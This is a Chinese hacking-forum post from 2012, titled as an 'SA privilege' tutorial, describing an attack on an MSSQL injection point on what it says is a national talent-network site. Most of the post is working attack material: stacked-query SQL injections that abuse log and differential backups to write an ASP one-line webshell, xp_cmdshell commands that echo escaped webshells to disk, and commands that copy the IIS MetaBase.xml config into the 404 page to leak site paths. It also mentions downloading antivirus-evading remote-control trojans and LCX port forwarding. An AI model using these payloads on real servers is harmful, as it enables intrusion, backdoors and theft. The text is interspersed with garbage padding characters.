找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1954|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————1 j% L& e3 m$ _' C/ C
2 e, a) v2 @: }$ X- t( A

# N1 K. s( g  j  K! r" Y                                                             欢迎高手访问指导,欢迎新手朋友交流学习。- E+ c3 e) f: c3 N7 J2 i6 E5 I
# B2 V' ]) F4 A; O) }
                                                                 & e" k5 `: t1 R' p( v
                                                                 
9 s6 X" p7 J1 u4 v9 @1 @                                                                  论坛: http://www.90team.net/  r$ u, }% i1 g& T6 j/ ]; }( Y

2 {5 _- x5 R( Z% I
( d* \$ T7 V$ d, i+ ^6 F2 ?" J$ r' C: l6 F
友情检测国家人才网
- h  G5 J6 @- p9 q
5 }! O9 [8 K. G* v/ I1 H- J  P: D
  ~) d$ ^" x; Z' D内容:MSSQL注入SA权限不显错模式下的入侵, n0 i$ B. ?- Z. z" k( Z2 W5 p
. y# {: \5 L3 y+ Z8 B
" Z9 a- G2 j2 @$ T, g$ M3 t7 j
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
# x/ Y, a; _# y, `$ P
4 v1 M1 o  K& G* W! c4 A) S我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。1 M3 ?" [  F( E, X7 f
* O3 k1 ^# ?$ U1 X& s9 ^: w( v6 W, Y

. j* l' O& |5 @这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。" ?& `8 X1 N' o: L4 F3 d

6 y; A' N. }; g9 l4 b7 B思路:) L$ I' z6 w' M2 }0 D5 O

( G6 r, x2 ]- E; a" c  H8 ^" M首先:
5 \3 o9 l& @- k: i" a- D
2 S! |) f3 @3 R% ~" {6 n" t通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
  V- _4 t- z- j9 c2 t0 j4 t9 `
# v$ y  ?) U: p8 ~9 i1.日志备份获得Webshell6 p. \! K+ J5 c# V1 e
8 G% U, U, a4 e. i# M$ t
2.数据库差异备份获得Webshell
1 q& Y* F3 d$ V8 W4 w% X' ]7 G9 }$ F( h7 W, h! E+ @5 T
4.直接下载免杀远控木马。
/ J9 i" v  ?& ~7 T
5 f9 p6 e9 N' G# Q9 ?- R6 M% I5.直接下载LCX将服务器端口转发出来) Y8 U$ _& Q  D4 n% K) C7 h4 P7 V
7 @; o' c2 t8 ]% I2 }
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
: m6 `* }" @$ G1 e) y
7 `5 ^8 u( B. Y6 S9 _
4 R* C7 [5 D5 Y  q4 Z1 }( ]; O/ a* j  u, C# R% A1 C/ R) A
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,   a; F) `5 y# F2 W) h, ?  \' t
4 J& p# V. ~' H4 j4 ?
我直接演示后面一个方法
4 {, Q. E- \( ]! }, g- j5 v; {! U; w7 k; V; _% P# f! a3 E

# L+ E& k/ L9 J1 e: i分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
% V/ G3 q( i8 H; L
" |+ e) i/ u$ F) R4 E5 y2 o
  ^- o1 ]0 G8 E, P% n* ]/ d/ \8 g
, R  y+ q+ p' }) S; @
◆日志备份:- T# [" ^, k. E: }2 b
' g8 [5 c, m# ^- K% ~! ]

5 h5 M' ^! {7 q4 _! ]% n0 H! m1. 进行初始备份+ B" D0 q7 E: U! v. H
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
+ N2 p/ F3 X+ O
# a/ s! V, v) u2. 插入数据
$ L9 S# }$ \# X5 A;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
$ z1 X; v0 f6 K# E# g* }  V% W, G3 x/ F- e  S  }
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
* E; j8 e. c9 L- T. [- l$ b/ ^3 ^3 j  9 Z) C) J+ J8 R, c) B! C
3. 备份并获得文件,删除临时表  G- e: J% t/ W$ g% P! ]' C
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
( ]$ b6 ]: ^/ w6 G  C& r( ]& J0 Q0 K

# i0 X) X% K) r, Z& G8 w! Q5 a% @5 L+ {1 T1 h
◆数据库差异备份
5 V$ P, O0 C, S9 {
: p, G0 R( _, H(1. 进行差异备份准备工作
) ?( D, U2 z1 x$ {4 c5 B
4 p8 z9 D% h/ L* f3 r6 e  T;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
$ A$ w8 Y2 w* e- `; c8 h+ \1 N
# W  ^; C- L. ?- Y% h0 e- D上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
$ K2 _  H* f# _0 J/ t2 D. Y $ l; k6 }- B' s) d$ W- _8 J% `
% L( Q" c3 ~4 _9 p6 b
(2. 将数据写入到数据库
/ G. [* V0 G5 t+ j) P& K/ R;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
: G; m' o* O, i, H: B+ P) h3 e
0 c% n' J' J0 \0 q0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
; C: f1 N" F' o3 p, z! m- H: M  T+ T7 h6 L+ P2 E( x; s# \
3. 备份数据库并清理临时文件
; U% m4 s% U4 K( j' H# o+ m+ u9 C1 ?/ ~4 g8 ^# n; J: e0 I
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--7 |' C* W9 z. Y' L$ B; L

) P  Y9 l! T, B* x% y# D0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 " m/ H! S/ ]( W4 V2 V
6 R: a5 t0 m; {1 c" _" o! S
; n3 C( ?6 p1 g, e' F& {) I/ ~
4 S; i$ @( X3 d# ]2 m
用^转义字符来写ASP(一句话木马)文件的方法:   
6 C7 e. a4 t2 x, B( C* e+ i$ y# L
- z* o) y# ^$ {; Q1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--% S3 y0 l3 o0 a9 Z9 ], g
) b3 H$ J( p: X+ k0 H
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp 8 R! X0 `9 C; i2 P; t
! F* E7 {  V* N1 W2 ^( }3 a
读取IIS配置信息获取web路径
- k1 r8 M" A, q) W( {# p: x" P* R+ B$ A: @$ m
     $ v( Z7 U  t0 ^4 `7 Y
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--. |% V3 n, L5 d1 |

* o* m% [. z9 J7 k执行命令
, k/ N; Z9 L: t" Q2 \8 Q1 j7 W     
4 X7 S' ~8 X, B1 Y2 s) {3 T     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--5 s' X0 B8 O- m% ~0 d. c
7 T; y, V/ p' ^$ ]
, b! k( R& c. g5 w1 w5 z

; |8 p- H; x3 V0 w/ K3 H1 T; V0 O) B& ^9 x8 U( y! v$ d

, m3 K# Q9 s8 p( X
5 x6 {/ @2 \; A9 F6 @- }9 g0 W' ?3 }: V& _' {# e8 M7 o) A

( J5 S. v0 O4 x6 S! B
/ j" k. Y  L, r2 y1 h
2 x: t' e7 h* q0 ]% X: r* U( D/ J0 d9 j

% \+ x: l! k! v( G" Q; w
4 Z; Q; T5 a& K% U+ B& A
7 ^" H0 B) }: `; J. Q/ T2 E/ s! Z) r5 X3 b! I* ?0 _; @

. e- z' [; ~  X! Q/ R9 M- ?5 ^- @  a# S, L
8 |# N5 c6 F% _. N$ F/ T9 p( \

- g2 w6 j( h' r# l" N, t8 }4 l2 }4 p
. _/ J. P2 [, L2 v5 d
2 ?* W5 W3 k. U9 z0 \$ o, I% l
- s, J, D- K0 {$ }/ h

" U' D0 U, [* M  ^0 J. u2 d  \; V, d0 v
. l; i: }+ {. L/ P' Z6 w
7 k" n- d$ q" W# A( \" i& g% y0 c7 I! b8 U+ @

) l2 w1 i, ^  H0 ~) _9 C1 j! m. E% S+ X/ L+ A
% F( E# S% l/ F$ H3 N2 H

+ _1 h' S/ X: B& q4 B6 `) \2 y
* C3 ]1 B- @  C: \% s+ ]1 o
( ?7 f8 T0 V% B" o9 b& B* R
- @8 N1 h$ z+ g3 M8 f" l  h* Q% m8 ?2 [1 Q

5 h. s9 C/ i; ^; Z/ g; D
1 O4 d$ [2 E( {1 l# P& q
  K0 K, F7 n2 B8 c0 r# r8 m$ F5 u

  J8 s4 v- q" M  S8 l8 N
6 T( v$ u3 Z! X3 {% G; I
/ D$ x; m; A( A. n1 f
8 ~, U. M0 ?! G* B( V4 e* j  b2 V

0 V/ H. N# I' u  X
6 D% B% s& G: b, e
" b. w: G( p2 E6 D% L6 g
( q% }6 P2 y2 `' R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表